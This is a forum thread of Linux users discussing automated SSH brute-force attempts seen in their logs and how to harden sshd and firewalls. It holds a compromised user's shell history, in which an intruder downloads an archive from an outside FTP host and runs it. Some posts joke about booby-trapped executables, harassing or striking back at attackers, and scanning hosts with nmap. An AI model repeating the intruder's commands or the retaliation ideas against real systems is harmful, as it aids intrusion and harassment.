I don't worry about these messages though - as long as you run a sensibly secured setup with decent passwords and/or keys and take all necessary precautions nothing is going to happen. This is probably some scriptkiddie running some l33t scripts he found on the net that checks for obvious/old vulns that world+dog-idiots have patched/fixed long ago.

Personally, my worst security nightmare is not having a box rooted (wich is bad), but having a damn good hacker on your box and being none the wiser.

edit - i checked another 5 "assorted systems" (colos, my home router, etc) and found that they all have these login attempts. This thing is probably pretty widespread.

----------

## dat

 *BlinkEye wrote:*   

> he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

Yeah, that was the line that caught my eye too.  I figured he was using some different system logger than I use and that was adding those entries in there.  Anyone know what added security software he might be using?  Or more importantly, a good add-on to use? (Hopefully not too OT)

----------

## rtn

 *dat wrote:*   

>  *BlinkEye wrote:*   he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

That's actually from OpenSSH.  If you look in the file canohost.c in the

openssh sources:

```
        if (getaddrinfo(name, NULL, &hints, &aitop) != 0) {

                logit("reverse mapping checking getaddrinfo for %.700s "

                    "failed - POSSIBLE BREAKIN ATTEMPT!", name);

                return xstrdup(ntop);

        }
```

--rtn

----------

## flappy

gdesklets + multitail - displays your log file to your desktop - i know straight away when someone tries to break in... the moment i see this i log into the attacking systems ssh with the username "f*ck" first then again with the username "off"

----------

## nielchiano

Once again, it is proven that an unprotecter computer on the internet (either win or linux) is not safe; unless YOU take some security steps;

This is how my server is secured (So far NO break-in attempts, but there will be, once upon a time): GUIDE:

 Run SSH on a non-default port (i.e. NOT on TCP/22). Make your pick 1022, 22022, ... you can go up to 65535

to do this, edit /etc/ssh/sshd_config, look for (or insert) this rule:

```
Port 1022
```

(change 1022 for your port)

Of cource, you'll have to specify on ALL the clients that will connect to use that port (ssh -p 1022 under linux)

 Add a group called 'ssh' (or whatever) add users that should be able to login to that group (to be done as root)

```
groupadd ssh
```

then edit /etc/group and look for the line starting with 'ssh' (or the name you just chose) to the end, add the list of users:

```
ssh:x:NNN:user1,user2,...
```

 (NNN will vary)

 Allow only key-logins:

You will need to have your key-file with you all the time (e.g. on USB-stcik)

----------

## dyqik

Hmm, I have a selection of 6 or 7 attempts to login as test, NOUSER and root in my logs on the 22nd.  I have to connect to my work machine (which is connected to the UK academic network, no firewalls allowed beyond what the University provides) from a wide variety of clients, so the only real option for me is to use password SSH on a default port.  

On the other hand, I check the logs, and SSH and ICMP are the only open ports, so I think that that is secure enough for now.  They didn't seem to want try and crack the passwords.  I'm going to disallow root SSH logins though.

----------

## dat

 *rtn wrote:*   

>  *dat wrote:*    *BlinkEye wrote:*   he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

Weird.. I use openssh and it doesn't log anything like that on failed login attempts.

UPDATE: nm, it's there..   :Rolling Eyes: 

----------

## froonk

I found such entries in my log, too. Anyway, I'm not very afraid of those 'attacks' since I pick my passwords very carefully (at least that's what I suppose). Although I'm a bit afraid that someone could bruteforce any of my accounts. Is there a way to increase the time sshd waits after a failed login? I took a quick look at the man page, but found nothing.

----------

## nielchiano

 *froonk wrote:*   

> I found such entries in my log, too. Anyway, I'm not very afraid of those 'attacks' since I pick my passwords very carefully (at least that's what I suppose). Although I'm a bit afraid that someone could bruteforce any of my accounts. Is there a way to increase the time sshd waits after a failed login? I took a quick look at the man page, but found nothing.

 

can't try it right now (at work), but I think you can do it if you tell SSHd to use PAM and configure that one

A note: If you have him wait for 5 seconds after a failed attempt; make sure that your firewall is also cooperative; else he'll just reconnect for each try; tell your firewall to allow only 1 connection per 5 seconds (from the same IP)

----------

## bcore

Argh.. Just noticed some more stuff at the bottom of .bash_history.. I didn't even notice this before.. I had snipped the bottom part off, cause I saw my own typing, and figured this was a part of it.

```

ls

cd 1

ls

rm -rf run

rm -rf run.tar

uname -a

uptime

ftp powerkill.netfirms.com

ls

tar xzvf ranga.tgz

ls

rm -rf ranga.tgz

cd lib

ls

./crond

./crond

./crond

./crond

./crond

./crond

./crond

ls

cd 1/lib/

ls

find | grep sc

sc

ls randfiles/

tail /var/log/messages

[ true ]

exit

```

I think it's high time for a reformat. God knows what's on this box now.... damn.

----------

## Valhlalla

My system is set up to email me any failed logins, but since I'm parranoid I'm going to check anyway  :Razz: 

----------

## qzec

I think its time for me to check my system.  :Shocked: 

Q

----------

## nok

There has indeed been a spate of these automated attempts to login to too-obvious accounts of computers running sshd;  since July I have had a long list of them for each computer I adminster in the weekly logwatch report.

Some previous postings make this sound quite a desperate situation --- e.g., hardware firewall, portknocking, highly restictive ip ranges allowed to connect, etc.  Somewhat following the attitude of the original post, I'd like to say I feel these are over-reactions, i.e. for most people any increase in security would be outweighed by expense or inconvenience.

Turn off unneccesary services.  

If having to run services for a local network that are not to be seen from the internet then consider a few simple iptables rules to ensure the services are blocked from the internet regardless of the services' own possible bugs or config file errors.  

Update sshd or other servers regularly (e.g. a cron job to emerge sync then check for keywords in the output of emerge -up world ).  

Consider forbidding ssh root logins -- a very good idea, since root is one username that no-one needs to guess.   

If you really only want to use ssh frrom a few known addresses, try limiting access by address. 

Above all, make sure user accounts have good passwords.

I'd be interested to hear comments on whether there have ever been linux iptables problems that would have made a hardware firewall a better option for preventing unwanted incoming connections.

Also, for those mentioning being "rooted" (without a `u'), do you mean the root password was guessed, or that some exploit was run as another user to become root?  What exploit?  Was it something in a standard gentoo installation.

Finally, try an automated reporting system such as logwatch -- a clever attacker who gains root would be able to hide the activities, but a wealth of information about system changes and failed  or successful logins is obtained in other circumstances!

----------

## dannycool

nok, rooted just means that the box was entirely compromised and an intruder got root access.

I've been working on a special ssh account on one of my boxes where you get a chrooted bash within a jail that's created on the fly, so after you log out the state of the jail is preserved and any following login would end up with a new jail...

But I'm unsure if I should really open up a ssh account. Even if it can't actually do much (except of course log what has been attempted to do).

----------

## mpalladi

I've just been 'done over' using a test:test account.

https://forums.gentoo.org/viewtopic.php?t=218822

What I can say is this:

I usually run ssh on a different port, and only had port 22 open and the test account created for a short time, a few hours whilst I was trying to get freenx working.

What I can't understand is even iff somone *did* get into my test account, how did they root me ? It must have been an exploit of some sort, but I am pretty up to date with emerge sync's and emerge -u system 

Mark

----------

## BlinkEye

 *dat wrote:*   

>  *rtn wrote:*    *dat wrote:*    *BlinkEye wrote:*   he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

i'm still very much interested in that feature because i use openSSH too! any hint?

----------

## BlinkEye

 *mpalladi wrote:*   

> I've just been 'done over' using a test:test account.
> 
> https://forums.gentoo.org/viewtopic.php?t=218822
> 
> What I can say is this:
> ...

 

well, i don't understand that neither. but what makes you so sure he got  root access? if he really did, we all got a problem

----------

## indanet

Thanks for this thread, very informative!

 *nok wrote:*   

> Consider forbidding ssh root logins -- a very good idea, since root is one username that no-one needs to guess.   
> 
> If you really only want to use ssh frrom a few known addresses, try limiting access by address.

 That's a good point.  Is it possible configure OpenSSHd in a way that allows root login from local network, but not from outside?  I did not find information on the internet how to do that.

My problem is, that my server has no keyboard attached, so it would be very handy if root login would be possible from the local network (although I could live without it).

EDIT: Could this goal be accomplished with /etc/login.access?  If I only wanted root to be able to login only from 192.168.0.2, 192.168.0.4, 192.168.0.5 and e.g. keyboard I would write the following line into my login.acces file:

```
# /etc/login.access

-:root:ALL EXCEPT 192.168.0.2 192.168.0.4 192.168.0.5 LOCAL
```

Would this file be valid?

Best regards

indanetLast edited by indanet on Tue Sep 07, 2004 11:00 pm; edited 1 time in total

----------

## BlinkEye

use a key (RSA for example)

----------

## Zepp

 *indanet wrote:*   

> Thanks for this thread, very informative!
> 
>  *nok wrote:*   Consider forbidding ssh root logins -- a very good idea, since root is one username that no-one needs to guess.   
> 
> If you really only want to use ssh frrom a few known addresses, try limiting access by address. That's a good point.  Is it possible configure OpenSSHd in a way that allows root login from local network, but not from outside?  I did not find information on the internet how to do that.
> ...

 

don't allow root login and just have a regular user in wheel group so you can ssh in as whatever user is then su to get root access on your server.

----------

## indanet

 *Zepp wrote:*   

>  *indanet wrote:*   If I only wanted root to be able to login only from 192.168.0.2, 192.168.0.4, 192.168.0.5 and e.g. keyboard I would write the following line into my login.acces file:
> 
> ```
> # /etc/login.access
> 
> ...

 

Thanks for the info. I know that, but would the above login.access file be valid?  IMHO this would be a tad bit more comfortable. (I could simply try it out, but I don't want to end up being locked out of my server  :Smile: )

----------

## rav

I think I'm pretty safe, considering that even if I was running a sshd I wouldn't even be able to get to it my self due to this crapy modem. However I was wondering why root isn't blocked by default in the configs? Also has anyone got a script to automaticaly blacklist any remote address which tries to login with root, w/o just parseing the logs? 

Btw, '/var/log/messages' is for syslog-ng right? what's the equivelent log file for metalog? /var/log/everyting/[date]?

----------

## indanet

 *rav wrote:*   

> Btw, '/var/log/messages' is for syslog-ng right? what's the equivelent log file for metalog? /var/log/everyting/[date]?

 If you want to see the logs for sshd, look into /var/log/sshd.

----------

## nyteryda

 *evoweiss wrote:*   

> 
> 
> Unfortunately, I managed to accidently delete the email. Did anybody else receive something similar and how did they know I use a zywall router/firewall (lucky guess?).
> 
> 

 

Obviously I don't know for sure as your router/firewall is a different make to mine, but on my router its pretty easy to tell who makes it...

```
nmap -sS -O -PI -PT <ROUTER-IP-ADDRESS>
```

----------

## nyteryda

 *kalisphoenix wrote:*   

> 
> 
> I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right?
> 
> 

 

Create a user with next to no rights (chroot ssh, just in case) , called test with password test, in his home directory, create a windows exe file that deletes his C:\ Drive and call it my-hardcore-pornlinks.exe  :Razz: 

----------

## Koon

 *mpalladi wrote:*   

> What I can't understand is even iff somone *did* get into my test account, how did they root me ? It must have been an exploit of some sort, but I am pretty up to date with emerge sync's and emerge -u system

 

Privilege escalation can be done through SUID-packages bugs and (more often) kernel bugs. emerge -u system won't upgrade your kernels. Advice : follow GLSAs and upgrade kernels too.

-- 

Koon

Gentoo Linux Security Team

----------

## amne

 *rav wrote:*   

> Btw, '/var/log/messages' is for syslog-ng right? what's the equivelent log file for metalog? /var/log/everyting/[date]?

 

/var/log/everything/current is the one used at the moment, the ones with a date are older versions (Usually one for every day).

----------

## WhimpyPeon

Good thread.  I am far from the expert on security, however I finally just broke down and got a firewall/router/switch at the local store.  I shelled out about $150 and got an 8 port switch with router and firewall functions.  In advance it was a Netgear FVS318 but other vendors have similar things out there.

By the time you take into consideration the time spent tweaking your firewall rules it is worth that much to me.  I ssh from work to an obscure port and the firewall redirects it to the standard ssh port on my gentoo box.  The firewall ignores (stealth) any requests not from my work ip.

Gentoo can do bout anything, but in the end I thought it was money well spent.

----------

## PaV

you can always try some iptables script, like ipkungfu (which im using). i find iptables much easier to configure that way.

----------

## evoweiss

 *WhimpyPeon wrote:*   

> Gentoo can do bout anything, but in the end I thought it was money well spent.

 

I thought the same thing when deciding how to secure my system, i.e., buying a router made security one less thing to worry about and provided the extra ports in case I had company, etc.

Also, I had a lot of hits on port 22 today (~120 from the same IP address). Thankfully, I am careful about passwords and accounts and nothing happened. However, I am beginning to think that I'd like to take the extra step and switch ssh over to some obscure port. Would I be right in assuming that I need to modify the sshd_config file by uncommenting the port line and giving it another port?

Also, is there a way I can determine which ports are not in use?

Best,

Alex

----------

## electric_hamster

 *kalisphoenix wrote:*   

> I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right?

 

Doesn't actually fuck them up, but I've used it a few times on people who've annoyed me:

```
cat /dev/urandom | write USER
```

It certainly results in a "WTF" moment for them  :Smile: 

----------

## BlinkEye

 *evoweiss wrote:*   

>  *WhimpyPeon wrote:*   Gentoo can do bout anything, but in the end I thought it was money well spent. 
> 
> I thought the same thing when deciding how to secure my system, i.e., buying a router made security one less thing to worry about and provided the extra ports in case I had company, etc.
> 
> Also, I had a lot of hits on port 22 today (~120 from the same IP address). Thankfully, I am careful about passwords and accounts and nothing happened. However, I am beginning to think that I'd like to take the extra step and switch ssh over to some obscure port. Would I be right in assuming that I need to modify the sshd_config file by uncommenting the port line and giving it another port?
> ...

 

this is done easily with

```
nmap domainname
```

there are quite a lot more options you might wanna use (type nmap --help), for example to spy out the operating system, or to narrow the search. two things to remember:

1. nmap-ing some host is called portknocking, which some or even most of the user consider as an attack. it's comparable on checking someone's house to see if a door is open - although you're not entering it (yet). but you see, in fact it's really unpolite and would cause a sensation in real life

2. if you or someone else uses some sort of firewall (for example iptables) you may simply drop or prohibit "pings" => it takes VERY long to scan a host (i recently had iptables which took 70 minutes to scan my box - i'm not at all an expert in that field and don't use these rules anymore - it's just for the record). so, for your box, ssh into it and do a 

```
nmap localhost
```

for your question about changing the port sshd runs on: yes, you may simply change 

```
Port 22
```

to whatever you want to (i suggest a really high number, i.e. <= 2^16)

[EDIT]nmap is a tool you'll have to emerge: net-analyzer/nmap[/EDIT]

----------

## BlinkEye

 *electric_hamster wrote:*   

>  *kalisphoenix wrote:*   I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right? 
> 
> Doesn't actually fuck them up, but I've used it a few times on people who've annoyed me:
> 
> ```
> ...

 

that's a good idea. but i don't like the idea having someone logged in i don't want to at all

----------

## ReneeTeunissen

 *evoweiss wrote:*   

> Over the past few weeks I've noticed a similar pattern of hack attempts against my box (ssh'ing in and attempting to log in with things like "test", "NOUSER", and "root").

 

Well, first thing I do is to ADD a second account "root" (eg toor or something like that and remove the shell from th real root. eg a small script as login shell which will email you or /bin/false.

 *evoweiss wrote:*   

> Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others.

 

guess what the firewall is running. There are no such things as hardware firewalls. You bought a small single board PC like device with some network in and outputs - with linux, bsd or any embedded OS on it - which just does IP filtering as ipfilter/netfilter does.

Because these things run - mostly - on a non-intel CPUs it is probably more secure agains trojans and other other precompileed hacker-stuf, but thats about all. 

Running an old box with linux and two networkcards in it and just doing IP filtering and forwarding - gives you about the same security level, probably even better. Except if you start running applications on it which can be exploited. If you add tools line snort you can detect and reject ssh-sessions on non-standard ports. Anyway, having a nicee backbox af firewall does not make you safer than a well configured linux box.

----------

## WhimpyPeon

evoweiss

You can change the port sshd listens on in /etc/ssh/sshd_conf.

I use ports used by other services not used by me (i.e. kazaa, morpheus...).

----------

## echo6

A couple of things.

/etc/hosts.allow is only appropriate if you are using tcp-wrappers,  so emerge that.

There has been a brute force ssh password checker released to the wild which does exactly what is being seen here,  that is checking root,  test and guest accounts and using a dictionary attack.   So make sure that you have strong passwords and frequently change them.  Disable root login and use a non default account.

I used to bind my ssh port to a non default port,  but personally I don't think it makes that much of a difference,  you can usually tell if a port is expecting a ssh connection.

----------

## coutts99

 *Quote:*   

> 1. nmap-ing some host is called portknocking, which some or even most of the user consider as an attack. it's comparable on checking someone's house to see if a door is open - although you're not entering it (yet). but you see, in fact it's really unpolite and would cause a sensation in real life

 

No it isn't, this is portknocking -:

Port knocking is a method of establishing a connection to a networked computer that has no open ports. Before a connection is established, ports are opened using a port knock sequence, which is a series of connection attempts to closed ports. A remote host generates and sends an authentic knock sequence in order to manipulate the server's firewall rules to open one or more specific ports. These manipulations are mediated by a port knock daemon, running on the server, which monitors the firewall log file for connection attempts which can be translated into authentic knock sequences. Once the desired ports are opened, the remote host can establish a connection and begin a session. Another knock sequence may used to trigger the closing of the port.

----------

## BlinkEye

i knew someone's gonna say that. i know what portknocking is, i tried to make an allegory, but i shouldn't have used a word already existing. i compared it with "the real life" as nmap-ing really is a port-knocking, i.e. a method to find open/closed door.

for further infos about portknocking (the method mentioned by coutts99), see this thread (which i'm following myself): https://forums.gentoo.org/viewtopic.php?p=1462199#1462199

----------

## darkcoder

 *bcore wrote:*   

> /var/log/messages with some serious grep action.

 

I got a system with metalog which do not create /var/log/messages.  I only got /var/log/everything.  That's the place I need to look at in my case?

----------

## darkcoder

but I got a gentoo box at work that its currently on testing, to replace oldy rh8 boxes and since I used syslog-ng on those, I check its /var/log/messages and found this:

```
Jul 15 20:49:44 pop sshd[19198]: Illegal user test from ::ffff:131.234.36.152

Jul 15 20:49:44 pop sshd[19198]: error: Could not get shadow information for NOU

SER

Jul 15 20:49:44 pop sshd[19198]: Failed password for illegal user test from ::ff

ff:131.234.36.152 port 34406 ssh2

Jul 15 20:49:45 pop sshd[19200]: User guest not allowed because shell /dev/null

is not executable

Jul 15 20:49:45 pop sshd[19200]: error: Could not get shadow information for NOU

SER

```

  That means someone tried to get inside my box?

----------

## BlinkEye

 *darkcoder wrote:*   

> but I got a gentoo box at work that its currently on testing, to replace oldy rh8 boxes and since I used syslog-ng on those, I check its /var/log/messages and found this:
> 
> ```
> Jul 15 20:49:44 pop sshd[19198]: Illegal user test from ::ffff:131.234.36.152
> 
> ...

 

yes it does.

----------

## groovin

i dotn think this attack necesarily aims at some known or unknow exploit... it just simply looks for carelessly set up boxes.

startling wake up call to the number of spread eagle boxes out there... 

test:test user:user etc sounds very M$-like.

----------

## Naffer

Ha, I've had my box set up letss then a week and I just noticed this intrusion attempt:

[size=8]

```
Sep  4 20:35:53 [sshd] Illegal user test from 213.239.58.119

Sep  4 20:35:54 [sshd] error: Could not get shadow information for NOUSER

Sep  4 20:35:54 [sshd] Failed password for illegal user test from 213.239.58.119 port 2898 ssh2

Sep  4 20:35:55 [sshd] Failed password for guest from 213.239.58.119 port 2944 ssh2

Sep  4 20:35:56 [sshd] Illegal user admin from 213.239.58.119

Sep  4 20:35:56 [sshd] error: Could not get shadow information for NOUSER

Sep  4 20:35:57 [sshd] Failed password for illegal user admin from 213.239.58.119 port 2976 ssh2

Sep  4 20:35:58 [sshd] Illegal user admin from 213.239.58.119

Sep  4 20:35:58 [sshd] error: Could not get shadow information for NOUSER

Sep  4 20:35:58 [sshd] Failed password for illegal user admin from 213.239.58.119 port 3013 ssh2

Sep  4 20:35:59 [sshd] Illegal user user from 213.239.58.119

Sep  4 20:36:00 [sshd] error: Could not get shadow information for NOUSER

Sep  4 20:36:00 [sshd] Failed password for illegal user user from 213.239.58.119 port 3048 ssh2

Sep  4 20:36:01 [sshd] Failed password for root from 213.239.58.119 port 3100 ssh2

Sep  4 20:36:02 [sshd] Failed password for root from 213.239.58.119 port 3122 ssh2

Sep  4 20:36:04 [sshd] Failed password for root from 213.239.58.119 port 3163 ssh2
```

 I'm going to go into my config and disallow all sshd logins except for my own (including root)

----------

## BlinkEye

is anyone out there who knows enough about iptables to drop OUTGOING connections and only allow specific ports/connection? would increase security in case windows boxes are behind the server (in case someone gets a nasty trojan or worm). i've started a thread here but gave up because i couldn't get any further ... https://forums.gentoo.org/viewtopic.php?t=214730&start=0&postdays=0&postorder=asc&highlight=

----------

## Suicidal

 *bcore wrote:*   

> Unfortunately I don't get a static IP from work, but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've already also got it set up do disallow root logins, so I figure I should be reasonably safe...

 

You could do that, and even though you dont have a static at work you could always set your entire  work subnet  in hosts.allow since sshd does use tcp wrapers. I have all of mine at work set this way even though they are not accessable from the internet.

----------

## michrech

But I've been seeing these attacks as well from the following IP's:

67.121.68.12

221.166.169.102

61.222.177.146

217.67.238.208 (This one has been used the most - shows up the most in my logs)

220.73.215.151

62.50.74.178

61.108.8.150

210.17.128.84

202.100.109.198

159.226.92.210

66.114.227.251

70.240.3.131

210.17.140.131

62.193.225.42

209.235.23.215

Well, going through there are many.  Checking most of these show that they are not assigned in America.  Don't know that it means anything..

----------

## hex4def6

heh - I just saw this post - adding my 2c.

Im getting the same illegal logins for NOUSER etc - the IP's that have attempted it so far:

140.109.82.84

blue.earth.sinica.edu.tw

218.235.97.206

Time to start a counter attack fellow gentooers?   :Laughing: 

----------

## dalek

 *hex4def6 wrote:*   

> 
> 
> Time to start a counter attack fellow gentooers?  

 

I bet we can't do much of anything, legally, to them since they are over there in Tawain.  I would also bet that if me and you did the same, we would only have our feet sticking out from under the jail.  ( remember the old wicked witch.  :Idea:  )  They don't mind attacking us, but we get in trouble for attacking them.

Of course, I would like to see their data pipe smoke though, computer too for that matter.

I say we switch everybody to Linux and run those bastards, crackers that is, off the planet.  Linux is way to secure for them to last long, just have to weed out the computer idiots.    :Twisted Evil:    "I'll just login as root and surf the web."   :Shocked:  Those idiots.

Later

 :Very Happy:   :Very Happy:   :Very Happy:   :Very Happy: 

----------

## Art Vandalay

damm, thanks for the heads up....having a look in my logfiles reveals the same shit going on...ie the cheeky bastards are trying to log on as test,root and guest

Sep  2 09:32:09 calista sshd[13685]: Failed password for invalid user root from 66.236.24.228 port 53755 ssh2

Sep  2 09:32:14 calista sshd[13690]: Failed password for invalid user root from 66.236.24.228 port 54013 ssh2

Sep  2 09:32:18 calista sshd[13695]: Failed password for invalid user root from 66.236.24.228 port 54276 ssh2

Sep  2 09:32:23 calista sshd[13700]: Failed password for invalid user root from 66.236.24.228 port 54539 ssh2

Sep  2 09:32:27 calista sshd[13705]: Failed password for invalid user root from 66.236.24.228 port 54799 ssh2

Sep  2 09:32:30 calista sshd[13710]: Failed password for invalid user test from 202.64.28.81 port 49365 ssh2

Sep  2 09:32:32 calista sshd[13715]: Failed password for invalid user root from 66.236.24.228 port 55067 ssh2

Sep  2 09:32:34 calista sshd[13720]: Failed password for invalid user guest from 202.64.28.81 port 49431 ssh2

Sep  2 12:36:07 calista sshd[13725]: Failed password for invalid user test from 203.197.175.233 port 38610 ssh2

Sep  2 12:36:15 calista sshd[13730]: Failed password for invalid user guest from 203.197.175.233 port 38674 ssh2

Sep  2 14:44:32 calista sshd[13736]: Failed password for invalid user test from 203.197.175.233 port 44133 ssh2

Sep  2 14:44:40 calista sshd[13741]: Failed password for invalid user guest from 203.197.175.233 port 44187 ssh2

Sep  3 12:13:29 calista sshd[10394]: Failed password for invalid user test from 211.184.51.3 port 35228 ssh2

Sep  3 12:13:35 calista sshd[10399]: Failed password for invalid user guest from 211.184.51.3 port 35335 ssh2

Sep  3 12:13:41 calista sshd[10404]: Failed password for invalid user admin from 211.184.51.3 port 35466 ssh2

Sep  3 12:13:47 calista sshd[10409]: Failed password for invalid user admin from 211.184.51.3 port 35609 ssh2

Sep  3 12:13:54 calista sshd[10414]: Failed password for invalid user user from 211.184.51.3 port 35770 ssh2

Sep  3 12:14:00 calista sshd[10419]: Failed password for invalid user root from 211.184.51.3 port 35948 ssh2

Sep  3 12:14:05 calista sshd[10424]: Failed password for invalid user root from 211.184.51.3 port 36142 ssh2

Sep  3 12:14:12 calista sshd[10429]: Failed password for invalid user root from 211.184.51.3 port 36312 ssh2

Sep  3 12:14:17 calista sshd[10434]: Failed password for invalid user test from 211.184.51.3 port 36482 ssh2

and thats just a small part of it....it started on sep 2,3,7 and 9th.

logging on as root is disabled but i think i'll restrict sshing to my box from  just my work ip from now on.

a sobering reminder to all of us to implement a firewall and follow basic linux security principals as no is exempt from being attacked.

----------

## BlinkEye

with

```
whois ipaddress
```

or

```
whois domainname
```

you see who owns a domainname i.e. an ip address. some of them are providers which do have an abuse@ip-address, abuse@domainname. maybe it would help dropping a mail?

----------

## C0deM0nkey

Maybe we could setup a simple database with the ipaddresses that are attempting these logins, with the time and date of the attempts and then fellow gentooers and server admins can use the db to restrict access to servers and/or services, admins at isp's could probably use the db to quickly identify customers machines within there ip range that maybe compromised. Any ideas?

-Code Monkey

----------

## BlinkEye

good idea. the first thing we'd need would be a grep command which sorts out these login attempts.

----------

## fleed

Have a look at this goody! I'm still testing it at home but it looks good so far.

http://r-fx.org/bfd.php

----------

## BlinkEye

if this is your page: i get a forbidden error!

----------

## fleed

No, it's not. I think I got that when I took a direct link as well. Try first going to r-fx.org then clicking on projects then bfd.

----------

## BlinkEye

i tried of course. i get a 403 anyway. but i'll keep going back, no problem. i'm curious what this all is about

----------

## tspse

 *BlinkEye wrote:*   

> i tried of course. i get a 403 anyway. but i'll keep going back, no problem. i'm curious what this all is about

 

i can access it by the link directly, no problems here.

----------

## BlinkEye

 *tspse wrote:*   

>  *BlinkEye wrote:*   i tried of course. i get a 403 anyway. but i'll keep going back, no problem. i'm curious what this all is about 
> 
> i can access it by the link directly, no problems here.

 

you only get a 403 error when trying to access it with good old beloved konqui. i don't like that! thanks for the hint (i launch firefox only when absolutely necessary)

----------

## Jeremy_Z

Is it "useful" ? if someone is stupid enougth to have a root:root or forgot that he had a test:test account, it won't protect him.

Just have a strong password, more than 10 chars should be good enougth against brute force attacks.

Still, the best way is to have the port stealth.

----------

## G.N.A.

 *Code Monkey wrote:*   

> Maybe we could setup a simple database with the ipaddresses that are attempting these logins, with the time and date of the attempts and then fellow gentooers and server admins can use the db to restrict access to servers and/or services, admins at isp's could probably use the db to quickly identify customers machines within there ip range that maybe compromised. Any ideas?
> 
> -Code Monkey

 

Check out Dshield. www.dshield.com

 I send them my daily router logs. They compile a list of the worst abusers and sent an automated email to the @abuse accounts for these ISPs.

GNA

----------

## skaven

 *ReneeTeunissen wrote:*   

>  *evoweiss wrote:*   Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others. 
> 
> guess what the firewall is running. There are no such things as hardware firewalls. You bought a small single board PC like device with some network in and outputs - with linux, bsd or any embedded OS on it - which just does IP filtering as ipfilter/netfilter does.
> 
> Because these things run - mostly - on a non-intel CPUs it is probably more secure agains trojans and other other precompileed hacker-stuf, but thats about all. 
> ...

 

I would have to argue about there not being hardware firewalls. Filtering can be moved off to an ASIC (such as with SonicWaLL ISAs), just as encryption/decryption often is. Whatever the device itself uses as an OS never has to actually look at the incoming or outgoing traffic from a firewall perspective. The OS would just have to load the rulests into memory. Granted, these Netgear and Linksys type firewall/router combos are way too low-end to have anything even close to that level of sophistication and it would likely be prohibitively (sp?) expensive to get all the bells and whistles of a firewall like Checkpoint NG all into hardware, but it can be done.

----------

## Sputnik66

hm... this is kind of startling. I was browsing the boards for a way to monitor my other box with root-tail because of the -constent- breakin attempts i have been getting lately on my 2nd linux box. i figured i could throw root-tail on my 2nd monitor for the server, and have root-tail on the first monitor for this machine.

anyhow i guess i'm not being specificly attacked as i read through this entire thread lol.

here's what i have been getting lately:

 *Quote:*   

> Sep  7 17:34:54 SPUTNIK2 sshd[8950]: Failed password for root from 210.52.66.56 port 46410 ssh2
> 
> Sep  7 17:34:57 SPUTNIK2 sshd[8952]: Failed password for root from 210.52.66.56 port 46617 ssh2
> 
> Sep  7 17:35:00 SPUTNIK2 sshd[8954]: Failed password for root from 210.52.66.56 port 46811 ssh2
> ...

 

that goes on and on. exactly 351 lines in the same time frame.

```

Sep  8 09:14:13 SPUTNIK2 sshd[12585]: Did not receive identification string from 61.166.155.162

Sep  9 11:55:21 SPUTNIK2 sshd[14506]: Did not receive identification string from 210.107.239.79

Sep 10 01:47:40 SPUTNIK2 sshd[15452]: Illegal user test from 130.149.64.97

Sep 10 01:47:40 SPUTNIK2 syslog-ng[5924]: STATS: dropped 0

Sep 10 01:47:40 SPUTNIK2 sshd[15452]: error: Could not get shadow information for NOUSER

Sep 10 01:47:40 SPUTNIK2 sshd[15452]: Failed password for illegal user test from 130.149.64.97 port 58978 ssh2

Sep 10 01:47:41 SPUTNIK2 sshd[15454]: User guest not allowed because shell /dev/null is not executable

Sep 10 01:47:42 SPUTNIK2 sshd[15454]: error: Could not get shadow information for NOUSER

Sep 10 01:47:42 SPUTNIK2 sshd[15454]: Failed password for illegal user guest from 130.149.64.97 port 58990 ssh2

Sep 10 07:40:48 SPUTNIK2 sshd[15862]: scanned from 24.75.10.56 with SSH-1.0-SSH_Version_Mapper.  Don't panic.

Sep 10 07:40:48 SPUTNIK2 sshd[15861]: Did not receive identification string from 24.75.10.56

Sep 11 09:15:02 SPUTNIK2 sshd[21105]: Illegal user test from 211.223.201.156

Sep 11 09:15:02 SPUTNIK2 syslog-ng[5924]: STATS: dropped 0

Sep 11 09:15:02 SPUTNIK2 sshd[21105]: error: Could not get shadow information for NOUSER

Sep 11 09:15:02 SPUTNIK2 sshd[21105]: Failed password for illegal user test from 211.223.201.156 port 3002 ssh2

Sep 11 09:15:04 SPUTNIK2 sshd[21107]: User guest not allowed because shell /dev/null is not executable

Sep 11 09:15:04 SPUTNIK2 sshd[21107]: error: Could not get shadow information for NOUSER

Sep 11 09:15:04 SPUTNIK2 sshd[21107]: Failed password for illegal user guest from 211.223.201.156 port 3072 

Sep 13 22:27:58 SPUTNIK2 sshd[15877]: Failed password for root from 81.58.5.35 port 3069 ssh2

Sep 13 22:28:01 SPUTNIK2 sshd[15879]: reverse mapping checking getaddrinfo for unlabelled-35-5-58-81.versatel.net failed - POSSIBLE BREAKIN ATTEMPT!

Sep 13 22:28:01 SPUTNIK2 sshd[15879]: Failed password for root from 81.58.5.35 port 3094 ssh2

Sep 13 22:28:04 SPUTNIK2 sshd[15881]: reverse mapping checking getaddrinfo for unlabelled-35-5-58-81.versatel.net failed - POSSIBLE BREAKIN ATTEMPT!

Sep 13 22:28:04 SPUTNIK2 sshd[15881]: Failed password for root from 81.58.5.35 port 3112 ssh2

Sep 13 22:28:06 SPUTNIK2 sshd[15883]: Illegal user test from 81.58.5.35

Sep 13 22:28:06 SPUTNIK2 sshd[15883]: reverse mapping checking getaddrinfo for unlabelled-35-5-58-81.versatel.net failed - POSSIBLE BREAKIN ATTEMPT!

Sep 13 22:28:06 SPUTNIK2 sshd[15883]: error: Could not get shadow information for NOUSER

```

this isn't even 20% of it.. it's all endless basicly, and starting to get irritateing.

i have been recording IPs lately. so far my list has:

```

81.58.5.35

210.52.66.56

210.107.239.79

130.149.64.97

211.223.201.156

80.138.248.157

24.75.10.56

```

